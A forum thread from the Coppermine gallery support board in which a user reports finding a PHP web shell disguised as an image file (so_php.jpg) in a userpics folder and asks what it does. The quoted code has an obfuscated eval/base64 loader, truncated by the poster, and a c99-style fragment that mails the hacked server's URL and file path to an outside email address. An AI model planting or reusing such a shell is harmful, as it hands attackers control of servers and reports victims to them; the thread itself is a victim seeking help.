gallery exploited - php shell? gallery exploited - php shell?
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

gallery exploited - php shell?

Started by toke, December 03, 2010, 10:05:27 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

toke

Hello,

today i was downloading a backup, and when i ziped it up with 7-zip my antvirus went off and i found this file was in /gallery/userpics/so_php.jpg

<?PHP
            //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCB[...........to long, had to cut it out. ill upload txt file...................]2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));

<?
// sh3ll.us & no-shell.net
// shell4spam@gmail.com
// shell4spam@gmail.com
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
   $to = "fofo-303@hotmail.com";
   $subject = "EGFM";
   $header = "from: EGFM <fofo-303@hotmail.com>";
   $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
   $message .= "Path : " . __file__;
   $sentmail = @mail($to, $subject, $message, $header);
   
   echo "";
   exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?>


i am about to upgrade to 1.5 however i would like to know what this code did.